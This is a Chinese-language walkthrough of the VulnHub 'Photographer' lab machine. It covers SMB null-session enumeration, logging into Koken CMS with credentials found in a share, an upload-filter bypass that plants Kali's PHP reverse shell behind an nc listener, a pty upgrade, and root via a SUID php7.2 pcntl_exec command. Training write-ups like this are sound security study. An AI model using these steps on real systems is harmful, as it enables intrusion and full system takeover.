靶机地址:++https://download.vulnhub.com/photographer/Photographer.ova++
端口目录

80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
80端口

01:42:17 200 - 466B - /assets/
01:42:23 200 - 564B - /images/
8000端口

01:45:36 200 - 515B - /admin/
01:45:36 200 - 515B - /admin/index.html
01:45:41 200 - 109B - /app/
01:45:41 200 - 109B - /app/cache/
01:45:41 200 - 109B - /app/logs/
01:45:46 200 - 1KB - /content/
01:45:47 200 - 1KB - /error/
每个访问页面都很卡,而且也没有说明有用信息,我是不知道怎么做了,那换一个思路
卡住后利用139和445端口
139和445端口是SMB服务端,可以轻松实现samba共享。通常在boot2root中,可以尝试空会话,看看有没有什么信息。现在将使用smbclient来查找无需认证就可以访问的共享。下面的命令是用来查找共享的:(或者使用文件管理器连接查看文件smb://192.168.113.138/sambashare/)
smbclient --N --L \\\\192.168.113.143
smbclient \\\\192.168.113.143\\sambashare
get mailsent.txt
get wordpress.bkp.zip

打开mailsent.txt文件,看有什么有用的信息:

还是有些重要信息的。得到了两个用户名Agi和Daisa。Agi说了一些秘密,可能是与密码有关的线索,保存下来为以后使用。
浏览80端口页面,结果没什么可以利用的点。所以浏览另一个端口8000。

在8000页面发现服务器应该运行的是Koken CMS,查看源码发现版本是koken 0.22.24

msf里面找不到

于是通过Google搜索个公开漏洞: https://www.exploit-db.com/exploits/48706
漏洞利用
读了下这个漏洞的描述,是一个文件上传漏洞,不过需要先登录到后台,于是浏览CMS的admin页面,页面需要输入凭证。
http://192.168.113.143:8000/admin/

使用之前获取的mailsent.tt文件中的信息,daisa@photographer.com和密码babygirl,试一下是否可行。
babygirl
Yes!登录进去了!

这里有文件上传的点,来试试看
上传kali自带的反弹shell.php,但是这里是白名单,那就用bp改后罪名
cp /usr/share/webshells/php/php-reverse-shell.php ./php-reverse-shell.php.jpg



修改这里
上传后,打开终端nc -lvnp 1234进行监听,然后通过浏览器访问页面,没多久便反弹回shell了。

进入home目录,有user.txt文件,查看其为flag:

完整 tty 升级
python2 -c 'import pty;pty.spawn("/bin/bash")'

权限提升
现在开始进行提权操作,先查看suid二进制文件权限,到tmp目录下执行命令:
find / -perm -u=s -type f 2>/dev/null

如上图。php7.2是被设置了suid权限,于是利用php7.2来进行提权,输入命令:
/usr/bin/php7.2 -r "pcntl_exec('/bin/bash', '-p');"
如下图所示,输入命令后,即提权成功,

进入root目录下,查看flag文件


